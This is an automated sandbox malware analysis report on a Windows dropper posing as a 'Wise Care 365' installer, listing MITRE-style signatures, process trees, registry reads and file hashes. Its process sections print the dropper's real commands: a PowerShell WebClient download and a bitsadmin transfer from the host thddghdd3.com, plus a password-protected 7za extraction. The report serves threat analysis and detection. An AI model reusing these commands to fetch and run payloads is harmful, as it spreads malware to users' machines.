Malware Analysis Report

2024-10-16 05:07

Sample ID 240725-al9jhsyhne
Target LisectAVT_2403002A_312.exe
SHA256 9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da
Tags
discovery dropper execution
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9eba6cd0a687ae936f858f5c36da8f8d18578575fe75a72a3772569d79a037da

Threat Level: Known bad

The file LisectAVT_2403002A_312.exe was found to be: Known bad.

Malicious Activity Summary

discovery dropper execution

Download via BitsAdmin

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Unsigned PE

Enumerates physical storage devices

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious use of WriteProcessMemory

Delays execution with timeout.exe

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-07-25 00:19

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-07-25 00:19

Reported

2024-07-25 00:21

Platform

win7-20240704-en

Max time kernel

147s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"

Signatures

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\ConsoleApp\7za.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\timeout.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2132 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp
PID 2132 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp
PID 2132 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp
PID 2132 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp
PID 2132 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp
PID 2132 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp
PID 2132 wrote to memory of 2316 N/A C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp
PID 2316 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2816 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 2316 wrote to memory of 2760 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Windows\SysWOW64\cmd.exe
PID 2760 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2760 wrote to memory of 2908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2816 wrote to memory of 2136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2816 wrote to memory of 2136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2816 wrote to memory of 2136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2816 wrote to memory of 2136 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\bitsadmin.exe
PID 2760 wrote to memory of 3048 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe
PID 2760 wrote to memory of 3048 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe
PID 2760 wrote to memory of 3048 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe
PID 2760 wrote to memory of 3048 N/A C:\Windows\SysWOW64\cmd.exe C:\ProgramData\ConsoleApp\7za.exe
PID 2760 wrote to memory of 1800 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2760 wrote to memory of 1800 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2760 wrote to memory of 1800 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2760 wrote to memory of 1800 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\timeout.exe
PID 2316 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe
PID 2316 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe
PID 2316 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe
PID 2316 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe
PID 2316 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe
PID 2316 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe
PID 2316 wrote to memory of 1988 N/A C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe
PID 1988 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp
PID 1988 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp
PID 1988 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp
PID 1988 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp
PID 1988 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp
PID 1988 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp
PID 1988 wrote to memory of 1740 N/A C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp

Processes

C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe

"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"

C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp

"C:\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp" /SL5="$400B2,38098121,731648,C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\ProgramData\ConsoleApp\ControlSet000.bat" "

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\ProgramData\ConsoleApp\main.bat" "

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "(New-Object Net.WebClient).DownloadFile('http://thddghdd3.com/hfile.bin', 'hfile.bin')"

C:\Windows\SysWOW64\bitsadmin.exe

bitsadmin /transfer Explorers /download /priority FOREGROUND http://thddghdd3.com/Telemetry.xml C:\Users\Admin\AppData\Local\Temp\Telemetry.xml

C:\ProgramData\ConsoleApp\7za.exe

7za.exe x -y -p1r7d2kvUf3 "*.7z"

C:\Windows\SysWOW64\timeout.exe

timeout /T 3 /NOBREAK

C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe

"C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe"

C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp

"C:\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp" /SL5="$40164,36755997,64512,C:\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 thddghdd3.com udp

Files

memory/2132-2-0x0000000000401000-0x00000000004A9000-memory.dmp

memory/2132-0-0x0000000000400000-0x00000000004C0000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-V4RH9.tmp\LisectAVT_2403002A_312.tmp

MD5 f098bb35dca6ae44a05c65aac7a5444b
SHA1 c5c50d740c1b8e9d8715fc3b2c8026156295a437
SHA256 8a0163353bdcc0882008990b0479c571c91adaca143af8c03da145b28b02e1fe
SHA512 71d8fc99a67bfc1e2b3635db6092d51d2ae9ec47f652aa10234770e878ab8bfaad69f7b971d54169363763df59ebb33143d161cd2a1cb60bc6fa2bbe6ba0227b

\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/2316-12-0x0000000000400000-0x000000000067B000-memory.dmp

C:\ProgramData\ConsoleApp\ControlSet000.bat

MD5 484c8df5d5bd9d82f4ac1861472cf519
SHA1 eddc0d20c81d9dba14ee0be32c7c5f563481e792
SHA256 f240f76de7e18fd3344eb7e5f4d6976a33a331ca12d0aff18032ef99bb3bf953
SHA512 6cf730eb19d4b80ce045c17b8e162448d65219be0f0e04ee02245af157ffe9cceb235c182800f44d9260cfa49c44b8e7a8c0a8d1db174a8dad75c33f60bad2b7

C:\ProgramData\ConsoleApp\main.bat

MD5 0ddc6dd98f86cff7e50c1621fd16b55a
SHA1 27e61b2bf7a367c491f25a3ef70df2ef0e38c36a
SHA256 b0a5f27817ebca5a17f75d625f1c73dc0d1c2499f1d155916d5a404013856df6
SHA512 07cb691bb23bb75c2c72c3e915b7af1f8b8c831f3d77e81c67f95c5d1ec7f754a7b823b9f1cdecd5cc511a4c34a6e8f0938eaad52f8d6451fee973ecfd2b9609

\ProgramData\ConsoleApp\7za.exe

MD5 c3d309156b8e8cf1d158de5fab1c2b40
SHA1 58ad15d91abac2c6203e389ac8a8ff6685406d41
SHA256 993cd78a697a09a497f3d05db6cc8183aea95a62f3fb4d1073173a919794747c
SHA512 2995d193512d0a4789b1710c51c1fc94939cba17ebbcf0181a214bc0d15ba21234bdc53816b3af6dc495d71fcce08dd1d1acc41e3de0fce17ce9f782e33d1498

memory/2132-57-0x0000000000400000-0x00000000004C0000-memory.dmp

memory/2316-58-0x0000000000400000-0x000000000067B000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-NH4GJ.tmp\Wise Care 365 5.9.1.582.exe

MD5 05fda662bb382c2c95b9318b2394b246
SHA1 69365314afb6102209a806e0e474d94e58207ec6
SHA256 1cdf90593f92f8de7a6a8b812756ff9359a0a9827f0843ef40e1983f17d6b8d2
SHA512 b8d792f5529672227b94c55a2e914b8bbc569d9ce70e5c17022a5568dc51febb4fb0a497009d4975f8dc7574989041edf093285d62c34f09d5d55da09869f312

memory/1988-66-0x0000000000400000-0x0000000000417000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-004M7.tmp\Wise Care 365 5.9.1.582.tmp

MD5 9d7850e858c24db77b91b25adf93812f
SHA1 f0bb0a9074b38dad7492422247c0a316197d26b6
SHA256 c062235322d35c79cfde7aea5fd90e9589e5fbca738ed41ab66de382e1a1b2e8
SHA512 e08084f265913a71d55750b75bbb01d1c43baa68d57eb9d6bc4ed46076577536b10901c06b92c66a926e07e268593b69936050cfacb8ed8e62b8fad86444e8ec

\Users\Admin\AppData\Local\Temp\is-A3D0Q.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/1740-84-0x0000000000600000-0x0000000000616000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-A3D0Q.tmp\ISTask.dll

MD5 86a1311d51c00b278cb7f27796ea442e
SHA1 ac08ac9d08f8f5380e2a9a65f4117862aa861a19
SHA256 e916bdf232744e00cbd8d608168a019c9f41a68a7e8390aa48cfb525276c483d
SHA512 129e4b8dd2665bcfc5e72b4585343c51127b5d027dbb0234291e7a197baeca1bab5ed074e65e5e8c969ee01f9f65cc52c9993037416de9bfff2f872e5aeba7ec

\Users\Admin\AppData\Local\Temp\is-A3D0Q.tmp\VclStylesInno.dll

MD5 b0ca93ceb050a2feff0b19e65072bbb5
SHA1 7ebbbbe2d2acd8fd516f824338d254a33b69f08d
SHA256 0e93313f42084d804b9ac4be53d844e549cfcaf19e6f276a3b0f82f01b9b2246
SHA512 37242423e62af30179906660c6dbbadca3dc2ba9e562f84315a69f3114765bc08e88321632843dbd78ba1728f8d1ce54a4edfa3b96a9d13e540aee895ae2d8e2

memory/1740-94-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-114-0x0000000007560000-0x0000000007561000-memory.dmp

memory/1740-145-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-144-0x0000000007600000-0x0000000007601000-memory.dmp

memory/1740-142-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-141-0x00000000075F0000-0x00000000075F1000-memory.dmp

memory/1740-140-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-139-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-138-0x00000000075E0000-0x00000000075E1000-memory.dmp

memory/1740-137-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-136-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-135-0x00000000075D0000-0x00000000075D1000-memory.dmp

memory/1740-134-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-132-0x00000000075C0000-0x00000000075C1000-memory.dmp

memory/1740-131-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-130-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-129-0x00000000075B0000-0x00000000075B1000-memory.dmp

memory/1740-128-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-127-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-126-0x00000000075A0000-0x00000000075A1000-memory.dmp

memory/1740-125-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-124-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-123-0x0000000007590000-0x0000000007591000-memory.dmp

memory/1740-122-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-121-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-120-0x0000000007580000-0x0000000007581000-memory.dmp

memory/1740-119-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-118-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-117-0x0000000007570000-0x0000000007571000-memory.dmp

memory/1740-116-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-115-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-113-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-112-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-111-0x0000000007550000-0x0000000007551000-memory.dmp

memory/1740-110-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-109-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-108-0x00000000024A0000-0x00000000024A1000-memory.dmp

memory/1740-107-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-106-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-105-0x0000000002490000-0x0000000002491000-memory.dmp

memory/1740-104-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-143-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-99-0x0000000002470000-0x0000000002471000-memory.dmp

memory/1740-98-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-97-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-133-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-96-0x0000000002460000-0x0000000002461000-memory.dmp

memory/1740-95-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-93-0x0000000002450000-0x0000000002451000-memory.dmp

memory/1740-92-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-91-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-103-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-102-0x0000000002480000-0x0000000002481000-memory.dmp

memory/1740-101-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-100-0x0000000007410000-0x0000000007550000-memory.dmp

memory/1740-90-0x0000000001F30000-0x0000000001F31000-memory.dmp

memory/1740-88-0x00000000070F0000-0x000000000740A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-07-25 00:19

Reported

2024-07-25 00:22

Platform

win10v2004-20240709-en

Max time kernel

150s

Max time network

128s

Command Line

"C:\Users\Admin\AppData\Local\Temp\LisectAVT_2403002A_312.exe"

Signatures

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\bitsadmin.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1750093773-264148664-1320403265-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-L9JQR.tmp\Wise Care 365 5.9.1.582.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-FETA4.tmp\Wise Care 365 5.9.1.582.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-L8J7F.tmp\LisectAVT_2403002A_312.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\bitsadmin.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\ConsoleApp\7za.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
